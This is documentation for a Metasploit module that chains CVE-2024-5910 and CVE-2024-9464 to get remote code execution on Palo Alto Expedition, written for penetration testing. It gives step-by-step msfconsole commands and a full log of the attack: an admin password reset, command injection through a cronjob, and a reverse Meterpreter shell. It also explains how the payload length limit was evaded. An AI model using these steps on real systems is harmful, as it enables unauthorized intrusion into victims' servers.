rapid7/metasploit-framework
# Palo Alto Expedition RCE (CVE-2024-5910 & CVE-2024-9464) Module

This is a new module which exploits two vulnerabilities (CVE-2024-5910 & CVE-2024-9464) in Palo Alto Expedition to obtain RCE.

## Verification Steps

1. Download the software from
[the vendor](https://live.paloaltonetworks.com/t5/expedition/ct-p/migration_tool). Version 1.2.91 can be obtained from [here](https://conversionupdates.paloaltonetworks.com/expedition-updates/expedition_1.2.91.all.deb). To deploy it successfully with the required dependencies, I used the latest version, which contains a shell script, as a reference.
2. Start `msfconsole`
3. `use exploit/linux/http/paloalto_expedition_rce`
4. `set RHOSTS <IP>`
5. `exploit`

This should result in a shell in the context of `www-data`.

```
msf6 exploit(linux/http/paloalto_expedition_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.204:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Admin password successfully restored to default value paloalto (CVE-2024-5910).
[+] Successfully authenticated
[*] Version retrieved: 1.2.91
[*] Vulnerable to CVE-2024-5910 and appears to be vulnerable to CVE-2024-9464.
[+] The target appears to be vulnerable.
[*] Adding a new cronjob...
[*] Injecting OS command...
[*] Sending stage (3045380 bytes) to 192.168.137.203
[*] Meterpreter session 1 opened (192.168.137.204:4444 -> 192.168.137.203:49006) at 2024-10-13 19:30:10 -0400
[*] cleanup file: /tmp/j
[*] Check thy shell.

meterpreter > sysinfo 
Computer     : 192.168.137.203
OS           : Ubuntu 20.04 (Linux 5.4.0-42-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid 
Server username: www-data
meterpreter > 
```

**Successfully tested on**

- Expedition v1.2.91 on Ubuntu Server 20.04.1.

Confirmed to be working with the `wget` and `curl` fetch payloads.

## Notes
It seems there is a restriction in length for the command that can be injected (97). Initially, I tried to define the bad characters which might break the payload when injected through 
```
'Payload' => {
          'BadChars' => "\x3a\x26" # :&
        },
```
but the encoded version is too long. However, it is possible to send multiple requests to the same vulnerable endpoint, hence I break up the original `FETCH_COMMAND` in multiple requests to obtain a meterpreter session.

At the end, I send an additional request to remove the previously downloaded payload. I had tried to use both `FETCH_DELETE` and `register_file_for_cleanup`, but in both cases they didn't seem to work for some reason.
